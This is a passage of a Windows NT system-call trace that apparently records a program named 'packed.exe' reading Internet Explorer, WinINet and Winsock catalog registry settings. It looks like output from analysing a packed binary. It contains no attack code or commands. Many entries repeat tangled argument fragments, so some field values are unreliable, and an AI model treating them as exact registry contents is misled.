120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02439 896 NtOpenKey (0x1, {24, 200, 0x40, 0, 0, (0x1, {24, 200, 0x40, 0, 0, "FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK"}, ... 204, ) }, ... 204, ) == 0x0 02440 896 NtQueryValueKey (204, (204, "packed.exe", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02441 896 NtQueryValueKey (204, (204, "*", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02442 896 NtClose (204, ... ) == 0x0 02443 896 NtClose (200, ... ) == 0x0 02444 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02445 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02446 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 200, ) }, ... 200, ) == 0x0 02447 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02448 896 NtOpenKey (0x1, {24, 200, 0x40, 0, 0, (0x1, {24, 200, 0x40, 0, 0, "FEATURE_DIGEST_NO_EXTRAS_IN_URI"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02449 896 NtClose (200, ... ) == 0x0 02450 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02451 896 NtQueryValueKey (200, (200, "DisableCachingOfSSLPages", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "DisableCachingOfSSLPages", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02452 896 NtClose (200, ... ) == 0x0 02453 896 NtQueryValueKey (52, (52, "PerUserCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02454 896 NtQueryValueKey (52, (52, "LeashLegacyCookies", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02455 896 NtQueryValueKey (52, (52, "DisableNT4RasCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02456 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02457 896 NtQueryValueKey (200, (200, "DialupUseLanSettings", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02458 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02459 896 NtQueryValueKey (204, (204, "DialupUseLanSettings", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02460 896 NtClose (200, ... ) == 0x0 02461 896 NtClose (204, ... ) == 0x0 02462 896 NtQueryValueKey (52, (52, "SendExtraCRLF", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02463 896 NtQueryValueKey (52, (52, "BypassFtpTimeCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02464 896 NtQueryValueKey (52, (52, "ReleaseSocketDuringAuth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02465 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02466 896 NtQueryValueKey (204, (204, "ReleaseSocketDuring401Auth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02467 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02468 896 NtQueryValueKey (200, (200, "ReleaseSocketDuring401Auth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02469 896 NtClose (204, ... ) == 0x0 02470 896 NtClose (200, ... ) == 0x0 02471 896 NtQueryValueKey (52, (52, "WpadSearchAllDomains", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02472 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02473 896 NtQueryValueKey (200, (200, "DisableLegacyPreAuthAsServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02474 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02475 896 NtQueryValueKey (204, (204, "DisableLegacyPreAuthAsServer", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02476 896 NtClose (200, ... ) == 0x0 02477 896 NtClose (204, ... ) == 0x0 02478 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02479 896 NtQueryValueKey (204, (204, "BypassHTTPNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02480 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02481 896 NtQueryValueKey (200, (200, "BypassHTTPNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02482 896 NtClose (204, ... ) == 0x0 02483 896 NtClose (200, ... ) == 0x0 02484 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02485 896 NtQueryValueKey (200, (200, "BypassSSLNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02486 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02487 896 NtQueryValueKey (204, (204, "BypassSSLNoCacheCheck", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02488 896 NtClose (200, ... ) == 0x0 02489 896 NtClose (204, ... ) == 0x0 02490 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02491 896 NtQueryValueKey (204, (204, "EnableHttpTrace", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02492 896 NtClose (204, ... ) == 0x0 02493 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 204, ) }, ... 204, ) == 0x0 02494 896 NtQueryValueKey (204, (204, "NoCheckAutodialOverRide", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02495 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02496 896 NtQueryValueKey (200, (200, "NoCheckAutodialOverRide", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02497 896 NtClose (204, ... ) == 0x0 02498 896 NtClose (200, ... ) == 0x0 02499 896 NtQueryValueKey (52, (52, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02500 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02501 896 NtQueryValueKey (200, (200, "DontUseDNSLoadBalancing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02502 896 NtClose (200, ... ) == 0x0 02503 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 200, ) }, ... 200, ) == 0x0 02504 896 NtQueryValueKey (200, (200, "ShareCredsWithWinHttp", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02505 896 NtClose (200, ... ) == 0x0 02506 896 NtQueryValueKey (52, (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0 02507 896 NtQueryValueKey (52, (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0 02508 896 NtQueryValueKey (52, (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0 02509 896 NtQueryValueKey (52, (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (52, "MimeExclusionListForCache", Partial, 144, ... TitleIdx=0, Type=1, Data="m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0m\0i\0x\0e\0d\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0m\0i\0x\0e\0d\0-\0r\0e\0p\0l\0a\0c\0e\0 \0m\0u\0l\0t\0i\0p\0a\0r\0t\0/\0x\0-\0b\0y\0t\0e\0r\0a\0n\0g\0e\0s\0 \0\0\0"}, 144, ) }, 144, ) == 0x0 02510 896 NtQueryValueKey (52, (52, "HeaderExclusionListForCache", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02511 896 NtQueryValueKey (52, (52, "DnsCacheEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02512 896 NtQueryValueKey (52, (52, "DnsCacheEntries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02513 896 NtQueryValueKey (52, (52, "DnsCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02514 896 NtQueryValueKey (52, (52, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (52, "WarnOnPost", Partial, 144, ... TitleIdx=0, Type=3, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02515 896 NtQueryValueKey (52, (52, "WarnAlwaysOnPost", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02516 896 NtQueryValueKey (52, (52, "WarnOnZoneCrossing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "WarnOnZoneCrossing", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02517 896 NtQueryValueKey (52, (52, "WarnOnBadCertSending", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02518 896 NtQueryValueKey (52, (52, "WarnOnBadCertRecving", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02519 896 NtQueryValueKey (52, (52, "WarnOnPostRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02520 896 NtQueryValueKey (52, (52, "AlwaysDrainOnRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02521 896 NtQueryValueKey (52, (52, "WarnOnHTTPSToHTTPRedirect", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02522 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\WininetStartupMutex"}, ... 200, ) }, ... 200, ) == 0x0 02523 896 NtAllocateVirtualMemory (-1, 1363968, 0, 4096, 4096, 4, ... 1363968, 4096, ) == 0x0 02524 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2_32.dll"}, 1238956, ... ) }, 1238956, ... ) == 0x0 02525 896 NtOpenKey (0x2000000, {24, 28, 0x40, 0, 0, (0x2000000, {24, 28, 0x40, 0, 0, "System\CurrentControlSet\Services\WinSock2\Parameters"}, ... 204, ) }, ... 204, ) == 0x0 02526 896 NtQueryValueKey (204, (204, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (204, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0 02527 896 NtQueryValueKey (204, (204, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (204, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0 02528 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 208, ) == 0x0 02529 896 NtOpenKey (0x2000000, {24, 204, 0x40, 0, 0, (0x2000000, {24, 204, 0x40, 0, 0, "Protocol_Catalog9"}, ... 212, ) }, ... 212, ) == 0x0 02530 896 NtQueryValueKey (212, (212, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (212, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) }, 16, ) == 0x0 02531 896 NtNotifyChangeKey (212, 208, 0, 0, 2011455960, 1, 0, 0, 0, 1, ... ) == 0x103 02532 896 NtQueryValueKey (212, (212, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (212, "Serial_Access_Num", Partial, 144, ... TitleIdx=0, Type=4, Data="\15\0\0\0"}, 16, ) }, 16, ) == 0x0 02533 896 NtOpenKey (0x2000000, {24, 212, 0x40, 0, 0, (0x2000000, {24, 212, 0x40, 0, 0, "0000000D"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02534 896 NtQueryValueKey (212, (212, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="#\4\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (212, "Next_Catalog_Entry_ID", Partial, 144, ... TitleIdx=0, Type=4, Data="#\4\0\0"}, 16, ) }, 16, ) == 0x0 02535 896 NtQueryValueKey (212, (212, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\26\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (212, "Num_Catalog_Entries", Partial, 144, ... TitleIdx=0, Type=4, Data="\26\0\0\0"}, 16, ) }, 16, ) == 0x0 02536 896 NtOpenKey (0x2000000, {24, 212, 0x40, 0, 0, (0x2000000, {24, 212, 0x40, 0, 0, "Catalog_Entries"}, ... 216, ) }, ... 216, ) == 0x0 02537 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000001"}, ... 220, ) }, ... 220, ) == 0x0 02538 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02539 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02540 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\360\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0T\0C\0P\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0\355\11\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\02\0\356\11\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\360\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0\357\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\360\11\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5f\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\351\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 